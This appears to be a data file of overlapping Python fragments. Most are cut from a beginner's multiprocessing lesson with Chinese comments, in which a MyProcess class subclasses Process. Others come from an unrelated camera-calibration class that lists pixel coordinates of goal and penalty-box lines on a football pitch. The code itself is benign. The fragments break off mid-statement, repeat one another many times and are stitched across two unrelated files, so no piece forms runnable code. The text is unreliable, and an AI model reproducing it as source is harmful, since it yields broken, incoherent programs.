"= value super().__init__() # 引入父类 def fun(self): print(self.value) # 进程执行内容的入口函数 def run(self): self.fun()",
"self.fun() print(\"搞点大事情,想干嘛都行\") my_process = MyProcess(3) # 启动进程 进程执行内容从入口函数run引出 my_process.start() my_process.join() # class Process:",
"启动进程 进程执行内容从入口函数run引出 my_process.start() my_process.join() # class Process: # def __init__(self,target): # self._target =",
"# 启动进程 进程执行内容从入口函数run引出 my_process.start() my_process.join() # class Process: # def __init__(self,target): # self._target",
"class MyProcess(Process): def __init__(self,value): self.value = value super().__init__() # 引入父类 def fun(self): print(self.value)",
"def fun(self): print(self.value) # 进程执行内容的入口函数 def run(self): self.fun() print(\"搞点大事情,想干嘛都行\") my_process = MyProcess(3) #",
"def __init__(self,target): # self._target = target # # def run(self): # self._target() #",
"__init__(self,value): self.value = value super().__init__() # 引入父类 def fun(self): print(self.value) # 进程执行内容的入口函数 def",
"= MyProcess(3) # 启动进程 进程执行内容从入口函数run引出 my_process.start() my_process.join() # class Process: # def __init__(self,target):",
"# 进程执行内容的入口函数 def run(self): self.fun() print(\"搞点大事情,想干嘛都行\") my_process = MyProcess(3) # 启动进程 进程执行内容从入口函数run引出 my_process.start()",
"\"\"\" from multiprocessing import Process # 使用面向对象的思想 创建自己的进程类 class MyProcess(Process): def __init__(self,value): self.value",
"__init__(self,target): # self._target = target # # def run(self): # self._target() # #",
"print(self.value) # 进程执行内容的入口函数 def run(self): self.fun() print(\"搞点大事情,想干嘛都行\") my_process = MyProcess(3) # 启动进程 进程执行内容从入口函数run引出",
"value super().__init__() # 引入父类 def fun(self): print(self.value) # 进程执行内容的入口函数 def run(self): self.fun() print(\"搞点大事情,想干嘛都行\")",
"进程执行内容从入口函数run引出 my_process.start() my_process.join() # class Process: # def __init__(self,target): # self._target = target",
"# def __init__(self,target): # self._target = target # # def run(self): # self._target()",
"Process # 使用面向对象的思想 创建自己的进程类 class MyProcess(Process): def __init__(self,value): self.value = value super().__init__() #",
"def run(self): self.fun() print(\"搞点大事情,想干嘛都行\") my_process = MyProcess(3) # 启动进程 进程执行内容从入口函数run引出 my_process.start() my_process.join() #",
"class Process: # def __init__(self,target): # self._target = target # # def run(self):",
"# class Process: # def __init__(self,target): # self._target = target # # def",
"# 引入父类 def fun(self): print(self.value) # 进程执行内容的入口函数 def run(self): self.fun() print(\"搞点大事情,想干嘛都行\") my_process =",
"MyProcess(3) # 启动进程 进程执行内容从入口函数run引出 my_process.start() my_process.join() # class Process: # def __init__(self,target): #",
"Process: # def __init__(self,target): # self._target = target # # def run(self): #",
"self.value = value super().__init__() # 引入父类 def fun(self): print(self.value) # 进程执行内容的入口函数 def run(self):",
"# # def run(self): # self._target() # # def start(self): # # 创建进程",
"run(self): self.fun() print(\"搞点大事情,想干嘛都行\") my_process = MyProcess(3) # 启动进程 进程执行内容从入口函数run引出 my_process.start() my_process.join() # class",
"print(\"搞点大事情,想干嘛都行\") my_process = MyProcess(3) # 启动进程 进程执行内容从入口函数run引出 my_process.start() my_process.join() # class Process: #",
"= target # # def run(self): # self._target() # # def start(self): #",
"super().__init__() # 引入父类 def fun(self): print(self.value) # 进程执行内容的入口函数 def run(self): self.fun() print(\"搞点大事情,想干嘛都行\") my_process",
"def run(self): # self._target() # # def start(self): # # 创建进程 # self.run()",
"from multiprocessing import Process # 使用面向对象的思想 创建自己的进程类 class MyProcess(Process): def __init__(self,value): self.value =",
"my_process.start() my_process.join() # class Process: # def __init__(self,target): # self._target = target #",
"target # # def run(self): # self._target() # # def start(self): # #",
"\"\"\" 自定义进程类 \"\"\" from multiprocessing import Process # 使用面向对象的思想 创建自己的进程类 class MyProcess(Process): def",
"# 使用面向对象的思想 创建自己的进程类 class MyProcess(Process): def __init__(self,value): self.value = value super().__init__() # 引入父类",
"进程执行内容的入口函数 def run(self): self.fun() print(\"搞点大事情,想干嘛都行\") my_process = MyProcess(3) # 启动进程 进程执行内容从入口函数run引出 my_process.start() my_process.join()",
"<reponame>chaofan-zheng/python_learning_code<gh_stars>1-10 \"\"\" 自定义进程类 \"\"\" from multiprocessing import Process # 使用面向对象的思想 创建自己的进程类 class MyProcess(Process):",
"创建自己的进程类 class MyProcess(Process): def __init__(self,value): self.value = value super().__init__() # 引入父类 def fun(self):",
"# self._target = target # # def run(self): # self._target() # # def",
"引入父类 def fun(self): print(self.value) # 进程执行内容的入口函数 def run(self): self.fun() print(\"搞点大事情,想干嘛都行\") my_process = MyProcess(3)",
"自定义进程类 \"\"\" from multiprocessing import Process # 使用面向对象的思想 创建自己的进程类 class MyProcess(Process): def __init__(self,value):",
"def __init__(self,value): self.value = value super().__init__() # 引入父类 def fun(self): print(self.value) # 进程执行内容的入口函数",
"import Process # 使用面向对象的思想 创建自己的进程类 class MyProcess(Process): def __init__(self,value): self.value = value super().__init__()",
"fun(self): print(self.value) # 进程执行内容的入口函数 def run(self): self.fun() print(\"搞点大事情,想干嘛都行\") my_process = MyProcess(3) # 启动进程",
"self._target = target # # def run(self): # self._target() # # def start(self):",
"# def run(self): # self._target() # # def start(self): # # 创建进程 #",
"MyProcess(Process): def __init__(self,value): self.value = value super().__init__() # 引入父类 def fun(self): print(self.value) #",
"multiprocessing import Process # 使用面向对象的思想 创建自己的进程类 class MyProcess(Process): def __init__(self,value): self.value = value",
"使用面向对象的思想 创建自己的进程类 class MyProcess(Process): def __init__(self,value): self.value = value super().__init__() # 引入父类 def",
"my_process = MyProcess(3) # 启动进程 进程执行内容从入口函数run引出 my_process.start() my_process.join() # class Process: # def",
"my_process.join() # class Process: # def __init__(self,target): # self._target = target # #"
] |
[
"= soma + numero cont += 1 print(f' A soma dos {cont} numeros",
"= int(input('Informe um numero inteiro[digite 999 para ele parar ]:')) if numero ==",
"== 999: break soma = soma + numero cont += 1 print(f' A",
"while True: numero = int(input('Informe um numero inteiro[digite 999 para ele parar ]:'))",
"+ numero cont += 1 print(f' A soma dos {cont} numeros digitador é",
"parar ]:')) if numero == 999: break soma = soma + numero cont",
"999: break soma = soma + numero cont += 1 print(f' A soma",
"break soma = soma + numero cont += 1 print(f' A soma dos",
"um numero inteiro[digite 999 para ele parar ]:')) if numero == 999: break",
"para ele parar ]:')) if numero == 999: break soma = soma +",
"soma = cont =0 while True: numero = int(input('Informe um numero inteiro[digite 999",
"= cont =0 while True: numero = int(input('Informe um numero inteiro[digite 999 para",
"=0 while True: numero = int(input('Informe um numero inteiro[digite 999 para ele parar",
"numero == 999: break soma = soma + numero cont += 1 print(f'",
"numero = int(input('Informe um numero inteiro[digite 999 para ele parar ]:')) if numero",
"ele parar ]:')) if numero == 999: break soma = soma + numero",
"999 para ele parar ]:')) if numero == 999: break soma = soma",
"soma = soma + numero cont += 1 print(f' A soma dos {cont}",
"int(input('Informe um numero inteiro[digite 999 para ele parar ]:')) if numero == 999:",
"if numero == 999: break soma = soma + numero cont += 1",
"numero inteiro[digite 999 para ele parar ]:')) if numero == 999: break soma",
"True: numero = int(input('Informe um numero inteiro[digite 999 para ele parar ]:')) if",
"inteiro[digite 999 para ele parar ]:')) if numero == 999: break soma =",
"numero cont += 1 print(f' A soma dos {cont} numeros digitador é {soma}')",
"]:')) if numero == 999: break soma = soma + numero cont +=",
"cont =0 while True: numero = int(input('Informe um numero inteiro[digite 999 para ele",
"soma + numero cont += 1 print(f' A soma dos {cont} numeros digitador"
] |
[
"__init__(self): alpha = 13000 self.K = np.matrix([[alpha, 0.0, 800], [0.0, alpha, 400], [0.0,",
"(goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner,",
"ModelImage dir_path = os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha = 13000 self.K =",
"goal_right_bar = (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner) goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line",
"set_lines(self): goal_bot_left_corner = np.array([162 , 466, 1]) goal_bot_right_corner = np.array([932, 436, 1]) goal_top_left_corner",
"np.array([1592, 732, 1]) penalty_area_back_left = np.array([ 1, 465, 1]) penalty_area_back_right = np.array([1592, 408,",
"#keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732,",
"np.matrix([[alpha, 0.0, 800], [0.0, alpha, 400], [0.0, 0.0, 1.0]]) #Currently not used self.distortion_coeff",
"import os import numpy as np from interface.camera_calibration import ModelImage dir_path = os.path.dirname(os.path.realpath(__file__))",
"= np.array([162 , 466, 1]) goal_bot_right_corner = np.array([932, 436, 1]) goal_top_left_corner = np.array([698",
"#keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline, 1]) keeper_box_back_right = np.array([1421, 419, 1]) #keeper_box_front_left",
"= np.array([ 1, 465, 1]) penalty_area_back_right = np.array([1592, 408, 1]) #penalty_area_front_left = #penalty_area_front_right",
"1, 465, 1]) penalty_area_back_right = np.array([1592, 408, 1]) #penalty_area_front_left = #penalty_area_front_right = back_line",
"= None self.lines_img_ga = None self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self): goal_bot_left_corner =",
"(goal_bot_left_corner, goal_left_back_corner) goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right,",
"goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner) goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line",
"0.0, 800], [0.0, alpha, 400], [0.0, 0.0, 1.0]]) #Currently not used self.distortion_coeff =",
"self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self): goal_bot_left_corner = np.array([162 , 466, 1]) goal_bot_right_corner",
"= np.array([1442, 110, 1]) goal_left_back_corner = np.array([1, 141, 1]) goal_right_back_corner = np.array([721, 37,",
"keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left = np.array([ 1, 465, 1])",
"goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner) goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner)",
"self.distortion_coeff = None self.lines = None self.lines_img_ga = None self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\")",
"from interface.camera_calibration import ModelImage dir_path = os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha =",
"= os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self): goal_bot_left_corner = np.array([162 , 466, 1]) goal_bot_right_corner =",
"keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left = np.array([ 1, 465, 1]) penalty_area_back_right =",
"= (goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line =",
"goal_lines = {\"back_line\": back_line, \"goal_top_bar\": goal_top_bar, \"goal_left_bar\" : goal_left_bar, \"goal_right_bar\": goal_right_bar, \"goal_left_back_line\": goal_left_back_line,",
"\"goal_left_bar\" : goal_left_bar, \"goal_right_bar\": goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line}",
"interface.camera_calibration import ModelImage dir_path = os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha = 13000",
"1]) goal_left_back_corner = np.array([1, 141, 1]) goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left =",
"1]) #keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline, 1]) keeper_box_back_right = np.array([1421, 419, 1])",
"= {\"back_line\": back_line, \"goal_top_bar\": goal_top_bar, \"goal_left_bar\" : goal_left_bar, \"goal_right_bar\": goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\":",
"goal_bot_left_corner = np.array([162 , 466, 1]) goal_bot_right_corner = np.array([932, 436, 1]) goal_top_left_corner =",
"os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self): goal_bot_left_corner = np.array([162 , 466, 1]) goal_bot_right_corner = np.array([932,",
"1]) keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left = np.array([ 1, 465, 1]) penalty_area_back_right",
"goal_right_back_corner) #keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right)",
"\"goal_right_back_line\": goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {} self.lines = {**goal_lines, **keeper_box_lines,",
"[0.0, 0.0, 1.0]]) #Currently not used self.distortion_coeff = None self.lines = None self.lines_img_ga",
"keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line",
"\"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {} self.lines =",
"= (goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner) goal_right_back_line =",
"penalty_area_front_right) goal_lines = {\"back_line\": back_line, \"goal_top_bar\": goal_top_bar, \"goal_left_bar\" : goal_left_bar, \"goal_right_bar\": goal_right_bar, \"goal_left_back_line\":",
"800], [0.0, alpha, 400], [0.0, 0.0, 1.0]]) #Currently not used self.distortion_coeff = None",
"goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner) goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left)",
"= (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line =",
"used self.distortion_coeff = None self.lines = None self.lines_img_ga = None self.img_name = os.path.join(dir_path,",
"goal_top_right_corner = np.array([1442, 110, 1]) goal_left_back_corner = np.array([1, 141, 1]) goal_right_back_corner = np.array([721,",
"(goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left,",
"1]) penalty_area_back_right = np.array([1592, 408, 1]) #penalty_area_front_left = #penalty_area_front_right = back_line = (penalty_area_back_left,",
"back_line, \"goal_top_bar\": goal_top_bar, \"goal_left_bar\" : goal_left_bar, \"goal_right_bar\": goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines",
"408, 1]) #penalty_area_front_left = #penalty_area_front_right = back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner,",
"\"goal_right_bar\": goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {}",
"keeper_box_width/2, 0, backline, 1]) keeper_box_back_right = np.array([1421, 419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2,",
"= #penalty_area_front_right = back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar =",
"os import numpy as np from interface.camera_calibration import ModelImage dir_path = os.path.dirname(os.path.realpath(__file__)) class",
"= os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha = 13000 self.K = np.matrix([[alpha, 0.0,",
"= None self.lines = None self.lines_img_ga = None self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def",
"1]) #penalty_area_front_left = #penalty_area_front_right = back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner)",
"goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner) goal_right_back_line",
"= np.array([1592, 408, 1]) #penalty_area_front_left = #penalty_area_front_right = back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar",
"keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left)",
"numpy as np from interface.camera_calibration import ModelImage dir_path = os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def",
"= (goal_bot_left_corner, goal_left_back_corner) goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line =",
"#penalty_area_front_right = back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner,",
"penalty_area_back_right = np.array([1592, 408, 1]) #penalty_area_front_left = #penalty_area_front_right = back_line = (penalty_area_back_left, penalty_area_back_right)",
"(goal_bot_right_corner, goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner) goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line = (keeper_box_back_left,",
"111, 1]) goal_top_right_corner = np.array([1442, 110, 1]) goal_left_back_corner = np.array([1, 141, 1]) goal_right_back_corner",
"goal_left_back_corner = np.array([1, 141, 1]) goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left = np.array([",
"alpha = 13000 self.K = np.matrix([[alpha, 0.0, 800], [0.0, alpha, 400], [0.0, 0.0,",
"1.0]]) #Currently not used self.distortion_coeff = None self.lines = None self.lines_img_ga = None",
"None self.lines_img_ga = None self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self): goal_bot_left_corner = np.array([162",
"#keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line",
"= (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line =",
"keeper_box_front_right) #keeper_box_front_line = (keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right)",
"(penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right) goal_lines = {\"back_line\":",
"\"goal_top_bar\": goal_top_bar, \"goal_left_bar\" : goal_left_bar, \"goal_right_bar\": goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines =",
"= (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right) goal_lines = {\"back_line\": back_line, \"goal_top_bar\": goal_top_bar,",
"alpha, 400], [0.0, 0.0, 1.0]]) #Currently not used self.distortion_coeff = None self.lines =",
"= np.array([932, 436, 1]) goal_top_left_corner = np.array([698 , 111, 1]) goal_top_right_corner = np.array([1442,",
"self.K = np.matrix([[alpha, 0.0, 800], [0.0, alpha, 400], [0.0, 0.0, 1.0]]) #Currently not",
"keeper_box_back_right = np.array([1421, 419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline - keeper_box_depth,",
"1]) keeper_box_back_right = np.array([1421, 419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline -",
"goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line",
"backline, 1]) keeper_box_back_right = np.array([1421, 419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0, backline",
"0.0, 1.0]]) #Currently not used self.distortion_coeff = None self.lines = None self.lines_img_ga =",
"466, 1]) goal_bot_right_corner = np.array([932, 436, 1]) goal_top_left_corner = np.array([698 , 111, 1])",
"goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline, 1]) keeper_box_back_right",
"np.array([698 , 111, 1]) goal_top_right_corner = np.array([1442, 110, 1]) goal_left_back_corner = np.array([1, 141,",
"#penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right) goal_lines",
"np.array([1442, 110, 1]) goal_left_back_corner = np.array([1, 141, 1]) goal_right_back_corner = np.array([721, 37, 1])",
"#penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right) goal_lines = {\"back_line\": back_line, \"goal_top_bar\":",
"- keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732, 1]) penalty_area_back_left = np.array([ 1, 465,",
"FootballManCityCourtImage2(ModelImage): def __init__(self): alpha = 13000 self.K = np.matrix([[alpha, 0.0, 800], [0.0, alpha,",
"= (goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right) #keeper_box_front_line =",
"141, 1]) goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline,",
"= np.array([ keeper_box_width/2, 0, backline - keeper_box_depth, 1]) keeper_box_front_right = np.array([1592, 732, 1])",
"goal_top_bar, \"goal_left_bar\" : goal_left_bar, \"goal_right_bar\": goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\":",
"np.array([721, 37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline, 1]) keeper_box_back_right = np.array([1421,",
"import ModelImage dir_path = os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha = 13000 self.K",
"penalty_area_back_left = np.array([ 1, 465, 1]) penalty_area_back_right = np.array([1592, 408, 1]) #penalty_area_front_left =",
": goal_left_bar, \"goal_right_bar\": goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines",
"back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar",
"(penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right) goal_lines = {\"back_line\": back_line, \"goal_top_bar\": goal_top_bar, \"goal_left_bar\"",
"400], [0.0, 0.0, 1.0]]) #Currently not used self.distortion_coeff = None self.lines = None",
"penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right) goal_lines = {\"back_line\": back_line, \"goal_top_bar\": goal_top_bar, \"goal_left_bar\" :",
"def set_lines(self): goal_bot_left_corner = np.array([162 , 466, 1]) goal_bot_right_corner = np.array([932, 436, 1])",
"self.lines = None self.lines_img_ga = None self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self): goal_bot_left_corner",
"13000 self.K = np.matrix([[alpha, 0.0, 800], [0.0, alpha, 400], [0.0, 0.0, 1.0]]) #Currently",
"np.array([162 , 466, 1]) goal_bot_right_corner = np.array([932, 436, 1]) goal_top_left_corner = np.array([698 ,",
"penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right) goal_lines = {\"back_line\": back_line,",
"goal_top_left_corner = np.array([698 , 111, 1]) goal_top_right_corner = np.array([1442, 110, 1]) goal_left_back_corner =",
"\"rgb_goal_line_MCity_2.png\") def set_lines(self): goal_bot_left_corner = np.array([162 , 466, 1]) goal_bot_right_corner = np.array([932, 436,",
"(penalty_area_front_left, penalty_area_front_right) goal_lines = {\"back_line\": back_line, \"goal_top_bar\": goal_top_bar, \"goal_left_bar\" : goal_left_bar, \"goal_right_bar\": goal_right_bar,",
"1]) goal_top_right_corner = np.array([1442, 110, 1]) goal_left_back_corner = np.array([1, 141, 1]) goal_right_back_corner =",
"dir_path = os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha = 13000 self.K = np.matrix([[alpha,",
"np.array([ keeper_box_width/2, 0, backline, 1]) keeper_box_back_right = np.array([1421, 419, 1]) #keeper_box_front_left = np.array([",
"#penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right) goal_lines = {\"back_line\": back_line, \"goal_top_bar\": goal_top_bar, \"goal_left_bar\" : goal_left_bar,",
"37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline, 1]) keeper_box_back_right = np.array([1421, 419,",
"import numpy as np from interface.camera_calibration import ModelImage dir_path = os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage):",
"[0.0, alpha, 400], [0.0, 0.0, 1.0]]) #Currently not used self.distortion_coeff = None self.lines",
"(penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner) goal_right_bar = (goal_bot_right_corner,",
"= (goal_bot_right_corner, goal_top_right_corner) goal_left_back_line = (goal_bot_left_corner, goal_left_back_corner) goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line =",
"None self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self): goal_bot_left_corner = np.array([162 , 466, 1])",
"= np.matrix([[alpha, 0.0, 800], [0.0, alpha, 400], [0.0, 0.0, 1.0]]) #Currently not used",
"goal_left_back_corner) goal_right_back_line = (goal_bot_right_corner, goal_right_back_corner) #keeper_box_left_line = (keeper_box_back_left, keeper_box_front_left) keeper_box_right_line = (keeper_box_back_right, keeper_box_front_right)",
"not used self.distortion_coeff = None self.lines = None self.lines_img_ga = None self.img_name =",
"1]) goal_top_left_corner = np.array([698 , 111, 1]) goal_top_right_corner = np.array([1442, 110, 1]) goal_left_back_corner",
"self.lines_img_ga = None self.img_name = os.path.join(dir_path, \"rgb_goal_line_MCity_2.png\") def set_lines(self): goal_bot_left_corner = np.array([162 ,",
"(keeper_box_front_left, keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left,",
"np from interface.camera_calibration import ModelImage dir_path = os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self): alpha",
"1]) goal_right_back_corner = np.array([721, 37, 1]) #keeper_box_back_left = np.array([ keeper_box_width/2, 0, backline, 1])",
"0, backline, 1]) keeper_box_back_right = np.array([1421, 419, 1]) #keeper_box_front_left = np.array([ keeper_box_width/2, 0,",
"goal_left_bar, \"goal_right_bar\": goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines =",
"as np from interface.camera_calibration import ModelImage dir_path = os.path.dirname(os.path.realpath(__file__)) class FootballManCityCourtImage2(ModelImage): def __init__(self):",
"1]) goal_bot_right_corner = np.array([932, 436, 1]) goal_top_left_corner = np.array([698 , 111, 1]) goal_top_right_corner",
"#Currently not used self.distortion_coeff = None self.lines = None self.lines_img_ga = None self.img_name",
"keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {} self.lines = {**goal_lines, **keeper_box_lines, **penalty_box_lines} return",
"= np.array([698 , 111, 1]) goal_top_right_corner = np.array([1442, 110, 1]) goal_left_back_corner = np.array([1,",
", 466, 1]) goal_bot_right_corner = np.array([932, 436, 1]) goal_top_left_corner = np.array([698 , 111,",
"goal_right_bar, \"goal_left_back_line\": goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {} self.lines",
"= 13000 self.K = np.matrix([[alpha, 0.0, 800], [0.0, alpha, 400], [0.0, 0.0, 1.0]])",
"keeper_box_front_right) #penalty_box_left_line = (penalty_area_back_left, penalty_area_front_left) #penalty_box_right_line = (penalty_area_back_right, penalty_area_front_right) #penalty_box_front_line = (penalty_area_front_left, penalty_area_front_right)",
"goal_left_back_line, \"goal_right_back_line\": goal_right_back_line} keeper_box_lines = {\"keeper_box_right_line\": keeper_box_right_line} penalty_box_lines = {} self.lines = {**goal_lines,",
"= back_line = (penalty_area_back_left, penalty_area_back_right) goal_top_bar = (goal_top_left_corner, goal_top_right_corner) goal_left_bar = (goal_bot_left_corner, goal_top_left_corner)",
